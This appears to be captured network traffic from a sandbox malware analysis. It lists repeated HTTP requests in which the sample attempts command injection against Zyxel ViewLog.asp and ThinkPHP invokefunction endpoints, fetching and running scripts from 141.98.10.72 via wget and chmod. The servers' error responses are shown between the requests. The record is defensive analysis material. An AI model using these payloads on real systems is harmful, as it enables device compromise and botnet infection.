                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        238192.168.2.144096231.41.160.698080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:24.187705994 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:24.423666000 CET224INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        239192.168.2.143530831.210.173.318080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:24.364753962 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:24.580195904 CET1286INHTTP/1.1 400 Bad Request
                                                        Server: squid/3.3.8
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:33:24 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 3293
                                                        X-Squid-Error: ERR_INVALID_URL 0
                                                        Vary: Accept-Language
                                                        Content-Language: en
                                                        X-Cache: MISS from VPSMANAGER
                                                        X-Cache-Lookup: NONE from VPSMANAGER:8080
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 39 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c
                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2019 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titl


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        240192.168.2.145719894.130.11.1908080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:24.368731976 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:24.572204113 CET277INHTTP/1.1 404 Not Found
                                                        Server: nginx/1.21.2
                                                        Date: Wed, 14 Feb 2024 08:33:24 GMT
                                                        Content-Type: text/html
                                                        Connection: close
                                                        Content-Encoding: gzip
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 40 84 ac 44 1f 66 a8 3e d4 41 00 30 a0 c1 30 99 00 00 00
                                                        Data Ascii: (HML),I310Q/Qp/K&T$dCAfAyyyzF@Df>A00


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        241192.168.2.144860494.120.60.348080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:24.435328007 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        242192.168.2.145665294.187.111.2438080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:24.472537994 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        243192.168.2.1443630112.196.149.11080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:24.630908012 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:25.054740906 CET278INHTTP/1.1 404 Not Found
                                                        Content-Type: text/html
                                                        Content-Length: 132
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Data Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 20 4f 62 73 65 72 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 77 68 69 74 65 3e 0a 3c 48 31 3e 45 72 72 6f 72 20 4f 62 73 65 72 76 65 64 3c 2f 48 31 3e 0a 3c 50 3e 45 72 72 6f 72 3a 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e
                                                        Data Ascii: <HTML><HEAD><TITLE>Error Observed</TITLE></HEAD><BODY BGCOLOR=white><H1>Error Observed</H1><P>Error: 404 Not Found</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        244192.168.2.1443902112.46.40.15680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:25.029223919 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:25.540307999 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        245192.168.2.1443646112.196.149.11080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:25.446513891 CET148INData Raw: 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 45 72 72 6f 72 20 4f 62 73 65 72 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 77 68 69 74 65 3e 0a 3c 48 31 3e 45 72 72 6f 72
                                                        Data Ascii: <HTML><HEAD><TITLE>Error Observed</TITLE></HEAD><BODY BGCOLOR=white><H1>Error Observed</H1><P>Error: 400 Bad Request</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        246192.168.2.1459738112.173.96.22680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:25.706341028 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:25.982065916 CET339INHTTP/1.0 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 17:33:24 GMT
                                                        Server: Boa/0.94.14rc21
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=ISO-8859-1
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        247192.168.2.1457878112.146.101.18480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:25.740961075 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        248192.168.2.145782495.101.190.1880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.268812895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:27.483948946 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:27 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:27 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 37 66 32 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 36 30 37 26 23 34 36 3b 31 39 31 64 65 33 38 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;77f2645f&#46;1707899607&#46;191de38a</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        249192.168.2.144637095.216.74.9980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.272022009 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:27.490336895 CET339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Wed, 14 Feb 2024 08:33:27 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        250192.168.2.145025095.129.102.10780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:27.274372101 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:27.494469881 CET500INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:33:27 GMT
                                                        Server: Apache/2.4.52 (Debian)
                                                        Content-Length: 306
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 39 35 2e 31 32 39 2e 31 30 32 2e 31 30 37 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.52 (Debian) Server at 95.129.102.107 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
